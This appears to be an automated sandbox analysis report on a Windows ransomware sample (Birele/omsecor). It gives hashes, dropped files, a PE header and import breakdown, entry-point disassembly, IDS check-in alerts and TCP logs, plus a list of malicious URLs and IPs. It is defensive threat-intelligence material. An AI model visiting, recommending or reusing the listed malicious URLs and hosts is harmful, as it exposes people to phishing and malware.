	https://u7990385.ct.sendgrid.net/ls/click?upn=u001.oZ6GXC16Ztdw1ob-2F3C5yow-2FsK2YC4S8s269h9OLgp-2FGcQesCtXDXKgCEAF90Sa3OUL2ncGoAKstQjRhddelr-2Bx3frrehyL8aaBbhAx-2Fm3uQTToUZwzw9vU-2BHl4N8-2FbXNrXNM8F2aafYGXvb9twEoQeHC7ZwjccAi1SjLazzmL714x6k-2BjB-2FYwt496nNWzarkpA5xghtVvgqYssmknAftbQJOVkiDX5sql0puMOlG6Ca2eid008YPu-2FJJAayp-2BNXls84A_lhEpvcamcm95WhC017PRgRonrgi5omZ3brQwNa5yLk0xxDl3uLY9zV0ZhBwsp9AfIBgWj8srFe156S5Zns8ZjIc0B22GBm-2FhZ3msRvLKzUyGIuCFlA1E-2FK-2F4jc3IgU8qM5k5KxMmIwIRDSCQDvTZvmwB5zeTeqWWEJR7CvWSpeaqIj3hj5IgcRcoPBdptLYrUK3YLUsGuU0Nn50M3ArOROvseGYqZul0QkeqtDR41-2FsPFt-2Bw0YWW2P5gsCDH4XINxncIhICPIqlacC1ih-2B-2BRAhsouCrf5nolEyzWx0VnR2OrLuGwvR4-2BmBTgXGq5SQJ3CbNvM-2FaB5BLerpFqmqjPC-2FBlK6th1iVrhfmtBEFKLash-2FnkPpQ9qFxGwWTexJMh100AS4PilK2-2BJDfvjssuxk2jP-2BTagNOazV2F1Jk9Mugr3y7E9SivEGWyUbzdMThmnpVydb1qOFwMiocztErv1WWaB8B20Oa2SLt-2BLBsMdusfLwd3NNzPre6el-2F-2BIwBxDAqBb9JLV6vOLzfaD2L4-2BEuPbgzcrscVtaCNyARGoPUKi03imhTbJEcig8L4weEiABND5vwKtA-2FhKo5AjxecXMO22Vq7Og2y7v-2BJNgFB9rr-2Bm4W45XZxFP39Dqi18SUPOKX4pHFrdACciPinuj2QtBtIGNjV46-2Bve9hu0g1-2FpG1tOVv9Ebn32k-2Bl6CF6b6jzS3aTQvZkWKNIwLx5CoGs9uomn9yZPi6QaiSTeQkZ1uHupSYpVxbBCb-2FUyo6kMlbB0P27ShEzUFVY-2FpfPcfFofTKD4p7rklaM-2FIuG8-2F3ytR7SJ7I8GmSP8NTWs4vu3NTpV5MkgHfjeFoK-2BDQh6M7S2ys2qIf8m3qiLtFMHY6p7m4ep8JZqbC0axloFSX-2Fzbz51ZW-2BsyQEEbRqwx0S1i4lo9NhRXrfXOvn0A83bBDk31g9QfoWTGhHCjSEfuca9KJwe0GCABYAuqYeYHMc5qXhPv86r0l0ldRpwe39V9LJ5m6Go-3D	Get hash	malicious	Unknown	Browse	65.9.66.43
	https://hotmail.cdisaomiguel.com.br	Get hash	malicious	Unknown	Browse	18.245.31.5
	https://tas-pe.com/ahowe@europait.net#ahowe@europait.net	Get hash	malicious	HTMLPhisher	Browse	18.245.31.121
	https://us.pbe.encryption.symantec.com/login.html?msgUserId=13963009e4fab12e&enterprise=questdiagnostics&rrRegcode=9hfnDzwZ&locale=en_US	Get hash	malicious	Unknown	Browse	52.14.194.37
	HUo09bfA3g.exe	Get hash	malicious	Neconyd	Browse	52.34.198.229
	ae713827-e32c-f66b-fbdb-5405db450711.eml	Get hash	malicious	Unknown	Browse	75.2.57.54
	boatnet.spc.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
TANDEMUS	HUo09bfA3g.exe	Get hash	malicious	Neconyd	Browse	15.197.204.56
	https://send-space.s3.eu-north-1.amazonaws.com/de.html	Get hash	malicious	Unknown	Browse	15.197.193.217
	FW CMA SHZ Freight invoice CHN1080769.exe	Get hash	malicious	FormBook	Browse	15.197.225.128
	BbkbL3gS6s.msi	Get hash	malicious	Unknown	Browse	15.197.137.111
	Reminders for Msp-partner_ Server Alert.eml	Get hash	malicious	HTMLPhisher	Browse	15.197.193.217
	Viridine84.exe	Get hash	malicious	FormBook, GuLoader	Browse	15.197.148.33
	la.bot.arm.elf	Get hash	malicious	Unknown	Browse	15.211.66.93
	http://bigfoot99.com	Get hash	malicious	Unknown	Browse	15.197.193.217
	https://ascot.auditboardapp.com/task-redirect/4113?source=email&CTA=taskTitleLink&notificationId=044e55a3-481a-4a33-91c7-abbaf803b1d7&projectId=367&taskId=4113&notificationType=WS-task-submitted	Get hash	malicious	Unknown	Browse	15.197.213.252
	la.bot.powerpc.elf	Get hash	malicious	Unknown	Browse	15.196.196.61

Process:	C:\Users\user\Desktop\bd0wJGTae5.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	82768
Entropy (8bit):	6.931980900926571
Encrypted:	false
SSDEEP:	1536:fd9dseIOcE93bIvYvZEyF4EEOF6N4yS+AQmZcl/52izbR9Xwzz:XdseIOMEZEyFjEOFqTiQmOl/5xPvw3
MD5:	DC5D106C7C04B52DF85467D6D647221A
SHA1:	9EFAA7C7B942296F113737B372A241E48AC7AEBB
SHA-256:	B2EC66DF552BBA33B49E27925A0C8A428831BF97CD68C092A51DAA6C8130A8BD
SHA-512:	C70D3A5988ECF12F363A5E2314987A77AF6100BAAF596B631E266EF941080F330569A00D300E413C75CD03C5EE61328A3CD18E7F98596D5372B3E11F9EDC8837
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>...m...m...m.m.m...m.m.m...m^..m...m^..m...m...m.m.m.m...m.m.m...mRich...m................PE..L......P............................F.............@.........................................................................\|...........................PM..............................................@............................................text............................... ..`.rdata..D!......."..................@..@.data...,q..........................@...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\merocz.xc6

Download File

Process:	C:\Windows\SysWOW64\omsecor.exe
File Type:	data
Category:	dropped
Size (bytes):	100
Entropy (8bit):	1.9101865117490426
Encrypted:	false
SSDEEP:	3:gtqyu/GRJ8JSxNdl:gwDeR+J2
MD5:	EB1BFD27DEBD289CF899F80411359712
SHA1:	EB1FD916187CDBED9A9A021F99FA969AB6567F24
SHA-256:	C0407595D81656749554168E6888DF464D0A906ECFBEC36B3A3122BD8609126B
SHA-512:	A11A83C7ADA0B830D307FE4463DA374536BE7402BEAB400689762353119A5B41990D9788721F7D9EC1E86427609BA9FE65E5FF4681EA4AC86668ADA23A0200B9
Malicious:	false
Reputation:	low
Preview:	-x.x.x.x.x.x6x.x.xxxIxKxKxOxLxAxLxOxHxLxNxIxNxKxMxAx@x@xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

C:\Windows\SysWOW64\omsecor.exe

Download File

Process:	C:\Users\user\AppData\Roaming\omsecor.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	82768
Entropy (8bit):	6.931979532169011
Encrypted:	false
SSDEEP:	1536:Yd9dseIOcE93bIvYvZEyF4EEOF6N4yS+AQmZcl/52izbR9Xwzz:odseIOMEZEyFjEOFqTiQmOl/5xPvw3
MD5:	1F90E0A8D463721EBCD937EF25C65D05
SHA1:	0DF5B439B5BE601869FAABBA634389411FCCF016
SHA-256:	ADF9C23D48995613BF4DCE3431ACC28C0A615552295A6D087F5E6F282F8B58E0
SHA-512:	953175107BB29F2D175EEDAAA4ACFD4EB91241E9E5F08BEF95DD34E17ADE07FF2C69057C4531BAE56CCF7746A9FF23B4D94F62A79CBCA0898AE29366C637B051
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>...m...m...m.m.m...m.m.m...m^..m...m^..m...m...m.m.m.m...m.m.m...mRich...m................PE..L.....P............................F.............@.........................................................................\|...........................PM..............................................@............................................text............................... ..`.rdata..D!......."..................@..@.data...,q..........................@...........................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.931981333700789
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	bd0wJGTae5.exe
File size:	82'768 bytes
MD5:	cc4504807e32f91497d2c5a8dd1061f6
SHA1:	497678a9f8adc08d092b720d45797ad245e3d9d7
SHA256:	fb7cfd956db9c5dfdf55ddc48bfe2608f40dbbc91965d7791cf19f02fb931289
SHA512:	86e871e5a7b964c322862a642f34b0d5028ff038729500ba24a414ef0ec31b916bc51cef87d5827db2d08c2be524ec0353b1c0f9ada179eb55a32c2dcafde454
SSDEEP:	1536:Hd9dseIOcE93bIvYvZEyF4EEOF6N4yS+AQmZcl/52izbR9Xwzz:vdseIOMEZEyFjEOFqTiQmOl/5xPvw3
TLSH:	C7839D95B6F88076E9A318B0627CE9929CBDBEB515A0D0C3D350AC871DE13D2D73435B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>...m...m...m.m.m...m.m.m...m^..m...m^..m...m...m...m.m.m...m.m.m...mRich...m................PE..L...Z..P...................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x40b346
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x50B3A35A [Mon Nov 26 17:14:02 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	08b67a9663d3a8c9505f3b2561bbdd1c

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	02/09/2021 19:25:58 01/09/2022 19:25:58
Subject Chain	CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version:	3
Thumbprint MD5:	07BA2F139D35455A934AB0CED10CBE41
Thumbprint SHA-1:	5A257D333718C4B468A5DBC6643348AF667AEE3D
Thumbprint SHA-256:	F66C648A39C2B4845719707319B96BA37A6EFC854D02D4AB3EDA1B2DA853B7EB
Serial:	3300000439F61F7A676DA000AF000000000439

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
mov eax, 00001800h
call 00007F7D646E9BB2h
push ebx
push esi
push edi
mov edi, dword ptr [0040E0B0h]
mov esi, 00000400h
push esi
lea eax, dword ptr [ebp-00000800h]
push eax
xor ebx, ebx
push ebx
call edi
push 0040F4FCh
lea eax, dword ptr [ebp-00000800h]
call 00007F7D646E1A6Ah
test eax, eax
pop ecx
je 00007F7D646E79AFh
lea eax, dword ptr [ebp-00001800h]
push eax
call 00007F7D646E71E6h
test eax, eax
pop ecx
jne 00007F7D646E799Eh
push esi
lea eax, dword ptr [ebp-00000800h]
push eax
push ebx
call edi
push 00000001h
lea eax, dword ptr [ebp-00000800h]
push eax
push 0040F414h
push 0040F1D8h
push 80000001h
call 00007F7D646E2F96h
add esp, 14h
test eax, eax
push 00000004h
je 00007F7D646E7957h
push ebx
push 00000003h
jmp 00007F7D646E795Bh
call dword ptr [0040E064h]
push eax
push 00000006h
call 00007F7D646E6D03h
add esp, 0Ch
call 00007F7D646E7843h
call 00007F7D646E706Dh
test eax, eax
jne 00007F7D646E7944h
call 00007F7D646E70E3h
test eax, eax
je 00007F7D646E79B3h
push 00002710h
call dword ptr [0040E070h]
push 00000004h
push ebx
push 00000009h
call 00007F7D646E6CD4h
add esp, 0Ch
push esi
lea eax, dword ptr [ebp+00000000h]

Rich Headers

Programming Language:

[ASM] VS2005 build 50727
[ C ] VS2005 build 50727
[LNK] VS2005 build 50727

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xf77c	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xf600	0x4d50
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xf6a8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xe000	0x1b4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xcc18	0xce00	7d17b3af3ad18f4a94d7ab9fe07eac18	False	0.5967650182038835	data	6.6299319364593226	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xe000	0x2144	0x2200	56d9054057018e96543087e97c2a076e	False	0.4463465073529412	data	4.458482003449311	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x11000	0x1712c	0x200	9159e4683d74ea27f29c3b096294f663	False	0.466796875	data	3.7016590486098133	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
WININET.dll	HttpSendRequestW, InternetConnectW, HttpOpenRequestW, InternetSetPerSiteCookieDecisionW, InternetOpenUrlW, InternetAttemptConnect, InternetOpenW, InternetReadFile, InternetClearAllPerSiteCookieDecisions, InternetCloseHandle, InternetQueryDataAvailable, InternetSetOptionW
SHLWAPI.dll	StrStrIW, PathMatchSpecW, PathCombineW, wvnsprintfW, StrStrIA, PathRemoveFileSpecW
KERNEL32.dll	TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, GetVersionExA, HeapReAlloc, RtlUnwind, WideCharToMultiByte, MultiByteToWideChar, HeapCreate, CopyFileW, CreateThread, WaitForMultipleObjects, GetTickCount, DeleteFileW, CreateProcessW, SetUnhandledExceptionFilter, ExitProcess, GetLastError, LoadLibraryW, GetProcAddress, Sleep, VirtualProtect, GetPrivateProfileIntW, ExpandEnvironmentStringsW, GetPrivateProfileStringW, FindFirstFileW, SetFilePointer, SetEndOfFile, GetVersionExW, HeapAlloc, SetWaitableTimer, SystemTimeToFileTime, CreateWaitableTimerW, FindNextFileW, HeapFree, ReadFile, GetModuleFileNameW, GetFileTime, WaitForSingleObject, GetTimeZoneInformation, CreateFileW, CloseHandle, GetFileSizeEx, VirtualFree, GetProcessHeap, GetCurrentDirectoryW, VirtualAlloc, VirtualQuery, GetSystemTime, GetFileSize, FindClose, WriteFile, GetLocalTime, GetModuleHandleW, GetCommandLineW
USER32.dll	GetWindowLongW, DispatchMessageW, GetForegroundWindow, CharLowerW, CreateWindowExW, FindWindowW, PeekMessageW, SetForegroundWindow, GetSystemMetrics, MessageBoxW, SetWindowPos, SetWindowLongW, SetParent
ADVAPI32.dll	RegOpenKeyExW, RegEnumKeyExW, RegQueryValueExW, RegSetValueExW, RegCreateKeyExW, RegCloseKey
SHELL32.dll	SHGetFolderPathW
ole32.dll	CoCreateInstance, OleInitialize, CoInitialize
OLEAUT32.dll	SysFreeString, VariantInit, SysAllocString, VariantClear

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-01T16:03:56.410998+0100	2015786	ET MALWARE Ransom.Win32.Birele.gsg Checkin	1	192.168.2.4	49730	193.166.255.171	80	TCP
2024-11-01T16:04:05.127285+0100	2015786	ET MALWARE Ransom.Win32.Birele.gsg Checkin	1	192.168.2.4	49731	193.166.255.171	80	TCP
2024-11-01T16:04:05.885040+0100	2015786	ET MALWARE Ransom.Win32.Birele.gsg Checkin	1	192.168.2.4	49732	15.197.204.56	80	TCP
2024-11-01T16:04:07.185778+0100	2015786	ET MALWARE Ransom.Win32.Birele.gsg Checkin	1	192.168.2.4	49733	52.34.198.229	80	TCP
2024-11-01T16:04:07.207285+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	52.34.198.229	80	192.168.2.4	49733	TCP
2024-11-01T16:04:07.207285+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	52.34.198.229	80	192.168.2.4	49733	TCP
2024-11-01T16:04:11.505641+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	172.202.163.200	443	192.168.2.4	49735	TCP
2024-11-01T16:04:15.921297+0100	2015786	ET MALWARE Ransom.Win32.Birele.gsg Checkin	1	192.168.2.4	49734	193.166.255.171	80	TCP
2024-11-01T16:04:16.027992+0100	2016998	ET MALWARE Connection to Fitsec Sinkhole IP (Possible Infected Host)	1	192.168.2.4	49741	193.166.255.171	80	TCP
2024-11-01T16:04:24.544476+0100	2015786	ET MALWARE Ransom.Win32.Birele.gsg Checkin	1	192.168.2.4	49741	193.166.255.171	80	TCP
2024-11-01T16:04:25.297259+0100	2015786	ET MALWARE Ransom.Win32.Birele.gsg Checkin	1	192.168.2.4	49742	15.197.204.56	80	TCP
2024-11-01T16:04:26.234709+0100	2015786	ET MALWARE Ransom.Win32.Birele.gsg Checkin	1	192.168.2.4	49743	52.34.198.229	80	TCP
2024-11-01T16:04:34.852422+0100	2015786	ET MALWARE Ransom.Win32.Birele.gsg Checkin	1	192.168.2.4	49744	193.166.255.171	80	TCP
2024-11-01T16:04:43.451298+0100	2015786	ET MALWARE Ransom.Win32.Birele.gsg Checkin	1	192.168.2.4	49745	193.166.255.171	80	TCP
2024-11-01T16:04:43.943414+0100	2015786	ET MALWARE Ransom.Win32.Birele.gsg Checkin	1	192.168.2.4	49742	15.197.204.56	80	TCP
2024-11-01T16:04:44.887601+0100	2015786	ET MALWARE Ransom.Win32.Birele.gsg Checkin	1	192.168.2.4	49747	52.34.198.229	80	TCP
2024-11-01T16:04:49.791712+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	172.202.163.200	443	192.168.2.4	49769	TCP
2024-11-01T16:04:53.615773+0100	2015786	ET MALWARE Ransom.Win32.Birele.gsg Checkin	1	192.168.2.4	49748	193.166.255.171	80	TCP
2024-11-01T16:05:02.221231+0100	2015786	ET MALWARE Ransom.Win32.Birele.gsg Checkin	1	192.168.2.4	49798	193.166.255.171	80	TCP
2024-11-01T16:05:03.027476+0100	2015786	ET MALWARE Ransom.Win32.Birele.gsg Checkin	1	192.168.2.4	49838	15.197.204.56	80	TCP
2024-11-01T16:05:03.976731+0100	2015786	ET MALWARE Ransom.Win32.Birele.gsg Checkin	1	192.168.2.4	49844	52.34.198.229	80	TCP
2024-11-01T16:05:12.687295+0100	2015786	ET MALWARE Ransom.Win32.Birele.gsg Checkin	1	192.168.2.4	49851	193.166.255.171	80	TCP
2024-11-01T16:05:21.282609+0100	2015786	ET MALWARE Ransom.Win32.Birele.gsg Checkin	1	192.168.2.4	49899	193.166.255.171	80	TCP
2024-11-01T16:05:22.052289+0100	2015786	ET MALWARE Ransom.Win32.Birele.gsg Checkin	1	192.168.2.4	49945	15.197.204.56	80	TCP
2024-11-01T16:05:23.012530+0100	2015786	ET MALWARE Ransom.Win32.Birele.gsg Checkin	1	192.168.2.4	49951	52.34.198.229	80	TCP
2024-11-01T16:05:31.722523+0100	2015786	ET MALWARE Ransom.Win32.Birele.gsg Checkin	1	192.168.2.4	49958	193.166.255.171	80	TCP
2024-11-01T16:05:40.336101+0100	2015786	ET MALWARE Ransom.Win32.Birele.gsg Checkin	1	192.168.2.4	50008	193.166.255.171	80	TCP
2024-11-01T16:05:41.083381+0100	2015786	ET MALWARE Ransom.Win32.Birele.gsg Checkin	1	192.168.2.4	50023	15.197.204.56	80	TCP
2024-11-01T16:05:42.038840+0100	2015786	ET MALWARE Ransom.Win32.Birele.gsg Checkin	1	192.168.2.4	50024	52.34.198.229	80	TCP
2024-11-01T16:05:50.745370+0100	2015786	ET MALWARE Ransom.Win32.Birele.gsg Checkin	1	192.168.2.4	50025	193.166.255.171	80	TCP
2024-11-01T16:05:59.370566+0100	2015786	ET MALWARE Ransom.Win32.Birele.gsg Checkin	1	192.168.2.4	50026	193.166.255.171	80	TCP
2024-11-01T16:06:00.210738+0100	2015786	ET MALWARE Ransom.Win32.Birele.gsg Checkin	1	192.168.2.4	50027	15.197.204.56	80	TCP
2024-11-01T16:06:01.423576+0100	2015786	ET MALWARE Ransom.Win32.Birele.gsg Checkin	1	192.168.2.4	50028	52.34.198.229	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 1, 2024 16:03:55.533588886 CET	49730	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:03:55.538518906 CET	80	49730	193.166.255.171	192.168.2.4
Nov 1, 2024 16:03:55.538589954 CET	49730	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:03:55.547741890 CET	49730	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:03:55.552567959 CET	80	49730	193.166.255.171	192.168.2.4
Nov 1, 2024 16:03:56.410881996 CET	80	49730	193.166.255.171	192.168.2.4
Nov 1, 2024 16:03:56.410998106 CET	49730	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:03:56.411129951 CET	49730	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:03:56.415869951 CET	80	49730	193.166.255.171	192.168.2.4
Nov 1, 2024 16:03:56.650118113 CET	49731	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:03:56.655059099 CET	80	49731	193.166.255.171	192.168.2.4
Nov 1, 2024 16:03:56.655147076 CET	49731	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:03:56.655287981 CET	49731	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:03:56.660090923 CET	80	49731	193.166.255.171	192.168.2.4
Nov 1, 2024 16:04:05.127090931 CET	80	49731	193.166.255.171	192.168.2.4
Nov 1, 2024 16:04:05.127285004 CET	49731	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:04:05.127429008 CET	49731	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:04:05.132194996 CET	80	49731	193.166.255.171	192.168.2.4
Nov 1, 2024 16:04:05.245050907 CET	49732	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:04:05.249881983 CET	80	49732	15.197.204.56	192.168.2.4
Nov 1, 2024 16:04:05.249970913 CET	49732	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:04:05.250096083 CET	49732	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:04:05.255228996 CET	80	49732	15.197.204.56	192.168.2.4
Nov 1, 2024 16:04:05.884797096 CET	80	49732	15.197.204.56	192.168.2.4
Nov 1, 2024 16:04:05.885040045 CET	49732	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:04:06.345958948 CET	49733	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:04:06.350850105 CET	80	49733	52.34.198.229	192.168.2.4
Nov 1, 2024 16:04:06.350958109 CET	49733	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:04:06.351166964 CET	49733	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:04:06.356406927 CET	80	49733	52.34.198.229	192.168.2.4
Nov 1, 2024 16:04:07.185451984 CET	80	49733	52.34.198.229	192.168.2.4
Nov 1, 2024 16:04:07.185777903 CET	49733	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:04:07.201874018 CET	49733	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:04:07.207284927 CET	80	49733	52.34.198.229	192.168.2.4
Nov 1, 2024 16:04:07.207355022 CET	49733	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:04:07.433876991 CET	49734	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:04:07.435616016 CET	49732	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:04:07.438863993 CET	80	49734	193.166.255.171	192.168.2.4
Nov 1, 2024 16:04:07.438935041 CET	49734	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:04:07.439101934 CET	49734	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:04:07.443870068 CET	80	49734	193.166.255.171	192.168.2.4
Nov 1, 2024 16:04:15.921226025 CET	80	49734	193.166.255.171	192.168.2.4
Nov 1, 2024 16:04:15.921297073 CET	49734	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:04:15.921411991 CET	49734	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:04:15.926791906 CET	80	49734	193.166.255.171	192.168.2.4
Nov 1, 2024 16:04:16.027992010 CET	49741	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:04:16.033951998 CET	80	49741	193.166.255.171	192.168.2.4
Nov 1, 2024 16:04:16.034022093 CET	49741	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:04:16.034172058 CET	49741	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:04:16.039417982 CET	80	49741	193.166.255.171	192.168.2.4
Nov 1, 2024 16:04:24.544390917 CET	80	49741	193.166.255.171	192.168.2.4
Nov 1, 2024 16:04:24.544476032 CET	49741	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:04:24.544655085 CET	49741	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:04:24.549401045 CET	80	49741	193.166.255.171	192.168.2.4
Nov 1, 2024 16:04:24.655210972 CET	49742	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:04:24.660115004 CET	80	49742	15.197.204.56	192.168.2.4
Nov 1, 2024 16:04:24.660202980 CET	49742	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:04:24.661830902 CET	49742	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:04:24.666613102 CET	80	49742	15.197.204.56	192.168.2.4
Nov 1, 2024 16:04:25.293509960 CET	80	49742	15.197.204.56	192.168.2.4
Nov 1, 2024 16:04:25.297259092 CET	49742	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:04:25.403994083 CET	49743	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:04:25.409152985 CET	80	49743	52.34.198.229	192.168.2.4
Nov 1, 2024 16:04:25.409301043 CET	49743	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:04:25.409394979 CET	49743	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:04:25.414200068 CET	80	49743	52.34.198.229	192.168.2.4
Nov 1, 2024 16:04:26.234617949 CET	80	49743	52.34.198.229	192.168.2.4
Nov 1, 2024 16:04:26.234709024 CET	49743	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:04:26.235527992 CET	49743	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:04:26.240858078 CET	80	49743	52.34.198.229	192.168.2.4
Nov 1, 2024 16:04:26.240911007 CET	49743	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:04:26.354468107 CET	49744	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:04:26.360733986 CET	80	49744	193.166.255.171	192.168.2.4
Nov 1, 2024 16:04:26.360851049 CET	49744	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:04:26.361087084 CET	49744	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:04:26.367573023 CET	80	49744	193.166.255.171	192.168.2.4
Nov 1, 2024 16:04:34.852221012 CET	80	49744	193.166.255.171	192.168.2.4
Nov 1, 2024 16:04:34.852421999 CET	49744	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:04:34.852555990 CET	49744	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:04:34.857309103 CET	80	49744	193.166.255.171	192.168.2.4
Nov 1, 2024 16:04:34.963768959 CET	49745	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:04:34.968682051 CET	80	49745	193.166.255.171	192.168.2.4
Nov 1, 2024 16:04:34.968801022 CET	49745	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:04:34.968975067 CET	49745	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:04:34.978610992 CET	80	49745	193.166.255.171	192.168.2.4
Nov 1, 2024 16:04:43.451186895 CET	80	49745	193.166.255.171	192.168.2.4
Nov 1, 2024 16:04:43.451297998 CET	49745	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:04:43.454175949 CET	49745	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:04:43.459017038 CET	80	49745	193.166.255.171	192.168.2.4
Nov 1, 2024 16:04:43.785203934 CET	49742	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:04:43.790561914 CET	80	49742	15.197.204.56	192.168.2.4
Nov 1, 2024 16:04:43.943324089 CET	80	49742	15.197.204.56	192.168.2.4
Nov 1, 2024 16:04:43.943413973 CET	49742	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:04:44.057486057 CET	49747	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:04:44.062310934 CET	80	49747	52.34.198.229	192.168.2.4
